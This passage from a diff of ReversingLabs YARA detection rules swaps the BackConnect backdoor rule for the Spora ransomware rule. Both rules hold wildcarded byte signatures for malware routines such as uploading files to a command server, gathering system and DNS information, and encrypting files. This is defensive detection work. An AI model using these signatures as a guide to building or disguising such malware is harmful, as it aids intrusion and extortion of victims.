-            13 ?? 1F 0D 8D ?? ?? ?? ?? 25 16 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 40 13
-            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 11 ?? A2 25 19 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1A 28 ?? ?? ?? ?? A2 25 1B 1F 7C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 28 ?? ?? ??
-            ?? A2 25 1D 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 11 ?? A2 25 1F 09 1F 40 13 ??
-            12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 32 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 40
-            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 11 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ??
-            02 02 7B ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 26 1F 1E 8D ?? ?? ?? ?? 25 16 1F 66 13 ??
-            12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 6C 13 ??
-            12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 5B 13 ??
-            12 ?? 28 ?? ?? ?? ?? A2 25 1B 11 ?? A2 25 1C 1F 5D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
-            1D 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
-            1F 09 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13 ?? 12 ?? 28
+		$unzip_packed_file = {
+            28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 0B 06 07 2E ?? 07 06 28 ?? ?? ?? ?? 2D ?? 14
+            2A 02 73 ?? ?? ?? ?? 0C 16 8D ?? ?? ?? ?? 0D 08 6F ?? ?? ?? ?? 13 04 11 04 20
+            ?? ?? ?? ?? 40 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 68 13 05 08 6F ?? ?? ?? ?? 13 06
+            08 6F ?? ?? ?? ?? 13 07 11 04 20 ?? ?? ?? ?? 33 ?? 11 05 1F 14 33 ?? 11 06 2D
+            ?? 11 07 1E 2E ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 08 6F ?? ?? ?? ?? 26 08 6F
+            ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 13 08 08 6F ?? ?? ?? ??
+            13 09 08 6F ?? ?? ?? ?? 13 0A 11 09 16 31 ?? 11 09 8D ?? ?? ?? ?? 13 0B 08 11
+            0B 16 11 09 6F ?? ?? ?? ?? 26 11 0A 16 31 ?? 11 0A 8D ?? ?? ?? ?? 13 0C 08 11
+            0C 16 11 0A 6F ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 59 D4 8D ??
+            ?? ?? ?? 13 0D 08 11 0D 16 11 0D 8E 69 6F ?? ?? ?? ?? 26 11 0D 73 ?? ?? ?? ??
+            13 0E 11 08 8D ?? ?? ?? ?? 0D 11 0E 09 16 09 8E 69 6F ?? ?? ?? ?? 26 14 13 0D
+            38 ?? ?? ?? ?? 11 04 1F 18 63 13 0F 11 04 11 0F 1F 18 62 59 13 04 11 04 20 ??
+            ?? ?? ?? 40 ?? ?? ?? ?? 11 0F 17 33 ?? 08 6F ?? ?? ?? ?? 13 10 11 10 8D ?? ??
+            ?? ?? 0D 16 13 11 2B ?? 08 6F ?? ?? ?? ?? 13 12 08 6F ?? ?? ?? ?? 13 13 11 12
+            8D ?? ?? ?? ?? 13 15 08 11 15 16 11 15 8E 69 6F ?? ?? ?? ?? 26 11 15 73 ?? ??
+            ?? ?? 13 14 11 14 09 11 11 11 13 6F ?? ?? ?? ?? 26 11 11 11 13 58 13 11 11 11
+            11 10 32 ?? 11 0F 18 33 ?? 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            13 16 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 17 11 16 11 17 17
+            28 ?? ?? ?? ?? 13 18 11 18 02 1A 02 8E 69 1A 59 6F ?? ?? ?? ?? 13 19 11 19 28
+            ?? ?? ?? ?? 0D DE ?? 11 18 2C ?? 11 18 6F ?? ?? ?? ?? DC 11 0F 19 33 ?? 1F 10
+            8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 1A 1F 10 8D ?? ?? ?? ?? 25
+            D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 1B 11 1A 11 1B 17 28 ?? ?? ?? ?? 13 1C 11 1C
+            02 1A 02 8E 69 1A 59 6F ?? ?? ?? ?? 13 1D 11 1D 28 ?? ?? ?? ?? 0D DE 17 11 1C
+            2C ?? 11 1C 6F ?? ?? ?? ?? DC 72 B5 0E 00 70 73 ?? ?? ?? ?? 7A 08 6F ?? ?? ??
+            ?? 14 0C 09 2A
         }
-		$upload_file_to_c2_p2 = {
-            A2 25 1F 0B 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 70 13 ?? 12 ?? 28 ?? ??
-            ?? ?? A2 25 1F 0D 1F 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 6F 13 ?? 12 ?? 28
-            ?? ?? ?? ?? A2 25 1F 0F 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 64 13 ?? 12
-            ?? 28 ?? ?? ?? ?? A2 25 1F 11 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 64 13
-            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F
-            74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F
-            16 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 17 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1F 18 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 19 1F 72 13 ?? 12 ?? 28 ?? ?? ??
-            ?? A2 25 1F 1A 1F 76 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1B 1F 65 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 1F 1C 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1D 1F 2E 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 1F 0F 8D ?? ?? ?? ?? 25 16 1F
-            66 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F
-            6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F
-            20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 6E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F
+		$resolve_assembly = {
+            12 00 03 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 12 00 16 28 ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 17 8D ?? ?? ?? ?? 13 13 11 13 16 1F
+            2C 9D 11 13 6F ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 13 04 16 13 05 16 13 06 16 13 07 2B ??
+            09 11 07 9A 08 28 ?? ?? ?? ?? 2C 0A 09 11 07 17 58 9A 13 04 2B ?? 11 07 18 58 13 07
+            11 07 09 8E 69 17 59 32 ?? 11 04 6F ?? ?? ?? ?? 2D ?? 12 00 7B ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 2D ?? 28 ?? ?? ?? ?? 12 00 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 16
+            13 08 2B ?? 09 11 08 9A 08 28 ?? ?? ?? ?? 2C ?? 09 11 08 17 58 9A 13 04 2B ?? 11 08
+            18 58 13 08 11 08 09 8E 69 17 59 32 ?? 11 04 6F ?? ?? ?? ?? 16 3E ?? ?? ?? ?? 11 04
+            16 6F ?? ?? ?? ?? 1F 5B 33 ?? 11 04 1F 5D 6F ?? ?? ?? ?? 13 09 11 04 17 11 09 17 59
+            6F ?? ?? ?? ?? 13 0A 11 0A 1F 7A 6F ?? ?? ?? ?? 16 FE 04 16 FE 01 13 05 11 0A 1F 74
+            6F ?? ?? ?? ?? 16 FE 04 16 FE 01 13 06 11 04 11 09 17 58 6F ?? ?? ?? ?? 13 04 7E ??
+            ?? ?? ?? 25 13 14 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 11 04 6F ?? ?? ?? ?? 2C ?? 7E ?? ??
+            ?? ?? 11 04 6F ?? ?? ?? ?? 13 12 DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 04 6F ?? ?? ?? ??
+            13 0B 11 0B 39 ?? ?? ?? ?? 11 0B 6F ?? ?? ?? ?? 69 13 0C 11 0C 8D ?? ?? ?? ?? 13 0D
+            11 0B 11 0D 16 11 0C 6F ?? ?? ?? ?? 26 11 05 2C ?? 11 0D 28 ?? ?? ?? ?? 13 0D 14 13
+            0E 11 06 2D ?? 11 0D 28 ?? ?? ?? ?? 13 0E DE 0C 26 17 13 06 DE ?? 26 17 13 06 DE ??
+            11 06 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 04 28 ?? ?? ?? ?? 13 0F 11 0F 28 ?? ??
+            ?? ?? 26 11 0F 12 00 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 10 11 10 28 ??
+            ?? ?? ?? 2D ?? 11 10 28 ?? ?? ?? ?? 13 11 11 11 11 0D 16 11 0D 8E 69 6F ?? ?? ?? ??
+            11 11 6F ?? ?? ?? ?? 11 10 14 1A 28 ?? ?? ?? ?? 26 11 0F 14 1A 28 ?? ?? ?? ?? 26 11
+            10 28 ?? ?? ?? ?? 13 0E DE ?? 26 DE ?? 7E ?? ?? ?? ?? 11 04 11 0E 6F ?? ?? ?? ?? 11
+            0E 13 12 DE ?? DE ?? 11 14 28 ?? ?? ?? ?? DC 14 2A 11 12 2A
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $send_fingerprint_to_c2_p* ) ) and ( all of ( $get_files_and_directories_p* ) ) and ( all of ( $upload_file_to_c2_p* ) )
+		uint16( 0 ) == 0x5A4D and ( ( $call_encrypt and $encrypt_files and $start_process ) or ( $msgbox_timer ) or ( $unzip_packed_file and $resolve_assembly ) )
 }
-rule REVERSINGLABS_Win64_Backdoor_Backconnect : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Spora : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects BackConnect backdoor."
+		description = "Yara rule that detects Spora ransomware."
 		author = "ReversingLabs"
-		id = "2c65c7ea-8546-5423-a1e7-dc7c12663099"
-		date = "2025-04-11"
-		modified = "2025-04-11"
+		id = "f07ee1d4-d99b-5cbf-a1f0-a3802d9e3b47"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.BackConnect.yara#L1-L154"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Spora.yara#L1-L124"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7089d5f2dab21755e83ca81ea6cf0f8a55fa261fa2c556759812b16a3d78608a"
+		logic_hash = "4e18bb42277ce9194bf75fa45d95ea7e2bd51c5d7791d3d6e013fc07626e65b0"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "BackConnect"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Spora"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$network_communication_p1 = {
-            48 89 5C 24 ?? 4C 89 44 24 ?? 48 89 4C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 83
-            EC ?? 45 33 F6 4C 8B EA 45 8B FE 41 8B EE 41 8B FE 48 8B D9 48 8B 05 ?? ?? ?? ?? 44
-            3B B8 ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 48 8B 88 ?? ?? ?? ?? 44 39 74 39 ?? 0F 84 ?? ??
-            ?? ?? 48 8B 4C 39 ?? 41 FF C7 48 83 F9 ?? 0F 84 ?? ?? ?? ?? 49 8B D0 FF 15 ?? ?? ??
-            ?? 85 C0 48 8B 05 ?? ?? ?? ?? 48 8B 88 ?? ?? ?? ?? 74 ?? 44 89 74 24 ?? 48 8D 84 24
-            ?? ?? ?? ?? 44 89 B4 24 ?? ?? ?? ?? 4C 8D 4C 24 ?? 48 8B 4C 39 ?? BA ?? ?? ?? ?? 41
-            B8 ?? ?? ?? ?? 48 89 44 24 ?? FF 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 41 B0 ?? 48 8B
-            81 ?? ?? ?? ?? 44 88 74 07 ?? 8B C5 48 6B D0 ?? 48 03 91 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 48 8B 4C 39 ?? 49 8B D5 FF 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 85 C0
-            74 ?? 4C 8B 81 ?? ?? ?? ?? 42 80 7C 07 ?? ?? 75 ?? 8B C5 48 6B D0 ?? 49 03 D0 E8 ??
-            ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 49 8B D5 48 8B 4C 39 ?? FF 15 ??
-            ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B D3 44 8B E0 48 8B 89 ?? ?? ?? ?? 48 8B 4C 39 ??
-            FF 15 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 44 8B F0 48 8B 9E ?? ?? ?? ?? 48 03 DF 83 7B
-            ?? ?? 0F 84 ?? ?? ?? ?? 33 C9 E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 48 2B 43 ?? 48 83 F8
-            ?? 7E ?? 48 83 4B ?? ?? 45 33 F6 44 89 73 ?? 41 B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 45 85
-        }
-		$network_communication_p2 = {
-            F6 74 ?? 48 8B 15 ?? ?? ?? ?? 45 33 C9 48 8B 4B ?? 41 B8 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 45 33 F6 85 C0 74 ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 3D ??
-            ?? ?? ?? 75 ?? 41 8B C6 EB ?? 85 C0 78 ?? 01 43 ?? BA ?? ?? ?? ?? 4C 8B 0D ?? ?? ??
-            ?? 48 8B CE 44 8B 43 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 48 8B 4B ?? FF 15 ?? ?? ??
-            ?? 48 83 4B ?? ?? E9 ?? ?? ?? ?? 45 33 F6 45 85 E4 0F 84 ?? ?? ?? ?? 44 8B 43 ?? 45
-            85 C0 0F 84 ?? ?? ?? ?? 48 8B 53 ?? 45 33 C9 48 8B 4B ?? FF 15 ?? ?? ?? ?? 83 F8 ??
-            75 ?? FF 15 ?? ?? ?? ?? 48 8B 4B ?? FF 15 ?? ?? ?? ?? 48 83 4B ?? ?? 41 B8 ?? ?? ??
-            ?? 48 8B D3 44 89 73 ?? 48 8B CE E8 ?? ?? ?? ?? EB ?? 48 8B 4B ?? 29 43 ?? 44 8B 43
-            ?? 01 43 ?? 48 63 D0 48 03 D1 E8 ?? ?? ?? ?? 8A 4B ?? F6 C1 ?? 74 ?? 8B 43 ?? C1 E8
-            ?? 39 43 ?? 77 ?? 44 8B 43 ?? 80 E1 ?? 45 33 C9 88 4B ?? 48 8B CE 44 89 74 24 ?? 41
-            8D 51 ?? E8 ?? ?? ?? ?? F6 43 ?? ?? 74 ?? 44 39 73 ?? 75 ?? 45 33 C0 48 8B D3 48 8B
-            CE E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? FF C5 48 83 C7 ??
-            81 FD ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 33 C0 48 8B 9C 24 ?? ?? ?? ?? 48 83 C4 ?? 41 5F
-            41 5E 41 5D 41 5C 5F 5E 5D C3
-        }
-		$get_system_information = {
-            48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 41 54 41 55 41 56 41 57 48 8B EC 48
-            81 EC ?? ?? ?? ?? 48 8B F9 48 8D 4D ?? FF 15 ?? ?? ?? ?? 4C 8B 75 ?? 48 81 FF ?? ??
-            ?? ?? 76 ?? 48 8D 87 ?? ?? ?? ?? 4C 3B F0 4C 0F 42 F0 48 8B 1D ?? ?? ?? ?? 4C 8D A7
-            ?? ?? ?? ?? 4C 39 65 ?? 4C 0F 46 65 ?? 49 81 EC ?? ?? ?? ?? 33 F6 48 85 DB 74 ?? 49
-            3B DE 72 ?? 49 3B DC 73 ?? 48 39 73 ?? 0F 85 ?? ?? ?? ?? 48 8B 1B EB ?? 4C 8B FF 49
-            3B FE 72 ?? 44 8B 6D ?? 33 D2 49 8B C7 49 F7 F5 4C 2B FA 4D 2B FD 4D 3B FE 72 ?? 41
-            B8 ?? ?? ?? ?? 48 8D 55 ?? 49 8B CF FF 15 ?? ?? ?? ?? 48 85 C0 74 ?? 81 7D ?? ?? ??
-            ?? ?? 74 ?? 4C 8B 7D ?? 4D 3B FD 72 ?? EB ?? 4D 85 FF 74 ?? BA ?? ?? ?? ?? 41 B9 ??
-            ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B CF FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 85 ?? ??
-            ?? ?? 4D 3B FE 73 ?? 48 85 DB 0F 85 ?? ?? ?? ?? 49 3B FC 0F 87 ?? ?? ?? ?? 44 8B 7D
-            ?? 33 D2 48 8B C7 45 8B F7 49 F7 F7 41 8B C7 48 2B C2 48 03 C7 48 8B F8 49 3B C4 0F
-            87 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 85 C0 0F
-            84 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 74 ?? 33 D2 41 8D 7F ?? 48 03 7D ?? 48 03 7D ??
-            48 8B C7 49 F7 F6 48 2B FA 49 3B FC EB ?? 48 85 FF 74 ?? BA ?? ?? ?? ?? 41 B9 ?? ??
-            ?? ?? 41 B8 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 E9 ?? ?? ?? ??
-            48 8D 4B ?? 89 73 ?? BA ?? ?? ?? ?? 48 89 31 48 8B C1 48 89 4B ?? 48 83 C2 ?? 48 83
-            C1 ?? 48 8B F0 48 81 FA ?? ?? ?? ?? 76 ?? 48 8B 05 ?? ?? ?? ?? 48 89 03 48 89 1D ??
-            ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 48 8B C3 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B
-            E3 41 5F 41 5E 41 5D 41 5C 5D C3
+		$encrypt_files = {
+            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 57 FF 75 ?? 33 FF 89 7D ?? FF 15 ?? ?? ?? ?? 83 F8
+            ?? 0F 84 ?? ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 53 56 57 BE
+            ?? ?? ?? ?? 56 6A ?? 57 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB
+            ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 53 89 7D ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F
+            82 ?? ?? ?? ?? 6A ?? 57 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ??
+            ?? 57 8D 45 ?? 50 56 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 39 75
+            ?? 0F 85 ?? ?? ?? ?? 57 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F
+            84 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 3B
+            45 ?? 0F 84 ?? ?? ?? ?? 39 7D ?? 74 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? B9 ?? ??
+            ?? ?? 3B C1 72 ?? 89 4D ?? EB ?? 83 E0 ?? 89 45 ?? 57 FF 75 ?? 57 6A ?? 57 53 FF 15
+            ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? FF 75 ?? 57 57 6A ?? 50 FF 15 ?? ?? ??
+            ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 57 6A ?? 57 FF
+            75 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ?? 50 8D 45 ?? 50 57 6A ?? 57
+            FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 57 57
+            57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 6A ??
+            57 57 53 89 45 ?? FF 15 ?? ?? ?? ?? 57 8D 45 ?? 50 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50
+            53 FF D6 57 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF D6 C7 45 ?? ?? ?? ?? ?? FF 75 ?? FF
+            15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? C7 45 ??
+            ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 5E 5B 8B 45 ?? 5F 83 C5 ?? C9 C2
         }
-		$get_dns_servers_p1 = {
-            4C 8B DC 49 89 5B ?? 55 56 57 41 56 41 57 48 83 EC ?? 83 64 24 ?? ?? 49 8D 43 ?? 33
-            D2 49 89 43 ?? 49 83 63 ?? ?? 45 33 C9 45 33 C0 8D 7A ?? 8B CF FF 15 ?? ?? ?? ?? 8B
-            44 24 ?? 8D 6F ?? 85 C0 0F 84 ?? ?? ?? ?? 8B C8 8B D5 E8 ?? ?? ?? ?? 48 8B D8 48 85
-            C0 0F 84 ?? ?? ?? ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 33 D2 48 89 5C
-            24 ?? 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0B 8B D5 C1 E1 ?? 03 CD E8
-            ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 33 FF 39 3B 76 ?? 8B 4C BB ?? FF 15 ?? ?? ?? ??
-            48 8B D0 48 8B CE FF 15 ?? ?? ?? ?? 8B 03 2B C5 3B F8 73 ?? 48 8D 15 ?? ?? ?? ?? 48
-            8B CE FF 15 ?? ?? ?? ?? 03 FD 3B 3B 72 ?? 45 33 C9 4C 8D 05 ?? ?? ?? ?? 48 8B D6 48
-            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 48 8B CB 4C 8B F0
-            E8 ?? ?? ?? ?? EB ?? 48 8B CB E8 ?? ?? ?? ?? 45 33 F6 83 64 24 ?? ?? 48 8D 44 24 ??
-            48 89 44 24 ?? 45 33 C9 48 83 64 24 ?? ?? 45 33 C0 33 D2 33 C9 FF 15 ?? ?? ?? ?? 8B
-            44 24 ?? 85 C0 74 ?? 8D 48 ?? 48 8B D5 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8D
+		$create_key_file = {
+            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? 33 F6 89 75 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F
+            84 ?? ?? ?? ?? 57 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF 75 ?? BF ?? ?? ?? ?? 89 7D
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 8D 45 ?? 50 8D 45
+            ?? 50 56 6A ?? 56 FF 35 ?? ?? ?? ?? FF D7 FF 75 ?? FF 15 ?? ?? ?? ?? 83 E0 ?? 83 C0
+            ?? 50 89 45 ?? 8D 45 ?? 50 FF 75 ?? 56 56 56 FF 75 ?? FF D7 85 C0 0F 84 ?? ?? ?? ??
+            53 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D3 8B F8 3B FE 0F 84 ?? ?? ?? ?? 56 6A
+            ?? 57 56 FF 15 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D 04 47 50
+            FF 15 ?? ?? ?? ?? 83 C4 ?? 56 6A ?? 6A ?? 56 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ??
+            89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 8D 4D ?? 51 FF 75 ?? FF 75 ?? 50 FF 15 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 68
+            ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 81 7D ??
+            ?? ?? ?? ?? 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? 57 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D3 8B D8 3B DE 74 ?? 89 75 ?? 8B 45
+            ?? 56 FF 74 85 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 68 ?? ?? ?? ?? 53 FF
+            15 ?? ?? ?? ?? 8D 04 43 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 53 57 FF 15 ?? ?? ?? ?? FF
+            45 ?? 83 7D ?? ?? 72 ?? 53 FF 15 ?? ?? ?? ?? EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 57 FF
+            15 ?? ?? ?? ?? 5B FF 75 ?? FF 15 ?? ?? ?? ?? 5F 8B 45 ?? 5E 83 C5 ?? C9 C2
         }
-		$get_dns_servers_p2 = {
-            44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 33 D2 48 89 5C 24 ?? 33 C9 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 45 33 C9 4C 8D 05 ?? ?? ?? ?? 48 8B D3 48 8D 0D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 8B E8 EB ?? 48 8B CB E8 ?? ?? ?? ?? 33 ED 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 8D 53 ?? 8D
-            4F ?? E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 4C 8B C7 48 8D 15 ?? ?? ?? ?? 4D 03 C0
-            48 8B C8 E8 ?? ?? ?? ?? 45 33 C9 4C 8D 05 ?? ?? ?? ?? 48 8B D3 48 8D 0D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 4C 8B F8 48 85 DB 74 ?? 48 8B CB E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85
-            ED 48 8D 15 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 4D 8B C7 48 0F 45 D5 49 8B CE 48 83 64
-            24 ?? ?? 48 8B F0 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B C8 48 8B F8 E8 ?? ?? ?? ?? 49
